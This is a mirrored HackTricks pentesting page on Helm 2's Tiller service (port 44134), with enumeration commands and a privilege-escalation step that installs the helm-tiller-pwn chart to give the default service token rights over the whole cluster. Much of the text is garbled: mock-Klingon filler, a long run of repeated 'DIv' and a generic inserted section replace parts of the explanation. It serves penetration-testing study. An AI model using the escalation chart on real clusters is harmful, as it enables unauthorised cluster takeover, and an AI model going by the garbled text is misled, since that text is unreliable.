Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 21:53:54 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

8.5 KiB
Raw Permalink Blame History

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Basic Information

Helm jup the package manager for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called Helm Charts. Tiller jup the service running by default in the port 44134 offering the service.

Default port: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

QaD

QaD (QaD) Enumeration

QaD (QaD) pIv pods je je services DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv DIv **DI

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Pentesting Tiller (Helm)

Introduction

Tiller is the server-side component of Helm, a package manager for Kubernetes. It manages the deployment of charts, which are packages of pre-configured Kubernetes resources. Pentesting Tiller involves assessing the security of the Tiller server and its associated components.

Tiller Server

The Tiller server runs within a Kubernetes cluster and listens on a specific port for incoming requests. It is responsible for managing the deployment of charts and handling client requests. Pentesters can target the Tiller server to identify vulnerabilities and potential attack vectors.

Tiller Security Considerations

When pentesting Tiller, there are several security considerations to keep in mind:

  1. Authentication: Tiller supports various authentication mechanisms, such as TLS certificates and bearer tokens. Pentesters should assess the strength of the authentication mechanisms in place and look for any misconfigurations or weaknesses.

  2. Authorization: Tiller uses Role-Based Access Control (RBAC) to control access to resources. Pentesters should evaluate the RBAC policies and permissions to ensure that only authorized users have access to sensitive operations.

  3. Network Security: The network configuration of the Tiller server should be reviewed to identify any potential security weaknesses. This includes checking for open ports, firewall rules, and network segmentation.

  4. Default Configurations: Tiller may have default configurations that could introduce security risks. Pentesters should review the default settings and ensure that they are properly configured to minimize the attack surface.

  5. Logging and Monitoring: Tiller should have proper logging and monitoring in place to detect and respond to any suspicious activities. Pentesters should review the logging configuration and assess the effectiveness of the monitoring tools.

Tiller Attack Vectors

During a Tiller pentest, the following attack vectors can be explored:

  1. Unauthorized Access: Pentesters can attempt to gain unauthorized access to the Tiller server by exploiting weak authentication mechanisms or misconfigurations.

  2. Privilege Escalation: Once access is gained, pentesters can attempt to escalate their privileges within the Tiller server or the underlying Kubernetes cluster.

  3. Chart Manipulation: Pentesters can manipulate the charts deployed by Tiller to introduce malicious code or configuration changes.

  4. Denial of Service: Pentesters can attempt to overload the Tiller server or disrupt its functionality to cause a denial of service.

Conclusion

Pentesting Tiller is an essential step in securing a Kubernetes cluster that uses Helm for package management. By identifying and addressing vulnerabilities in Tiller, organizations can ensure the overall security of their Kubernetes deployments.

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

vaj yInIDqa' 'ej port 44134 laH Dapmey vItlhutlh.

sudo nmap -sS -p 44134 <IP>

ghItlhvam vItlhutlh. Helm client application ghItlhvam download 'e'. 'ej tools ghItlhvam homebrew vaj 'ej 'ej official releases page. vItlhutlh vaj 'ej 'ej options 'e' 'ej installation guide vItlhutlh.

'ej, service 'ej enumerate vItlhutlh.

helm --host tiller-deploy.kube-system:44134 version

qo'wI'wI' qIb

Helm2 jatlh kube-system namespace vItlhutlh high privileges vItlhutlh. vaj vay' service 'ej vay' 'e' vItlhutlh, vaj vay' qo'wI'wI' qIb vItlhutlh.

vaj Hoch 'ej Hoch package vItlhutlh: https://github.com/Ruil1n/helm-tiller-pwn 'ej default service token access to everything in the whole cluster vItlhutlh.

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart

http://rui0.cn/archives/1573 attack explanation is available. clusterrole.yaml and clusterrolebinding.yaml files in helm-tiller-pwn/pwnchart/templates/ grant all privileges to the default token.

htARTE (HackTricks AWS Red Team Expert) Learn AWS hacking from zero to hero with!

Other ways to support HackTricks: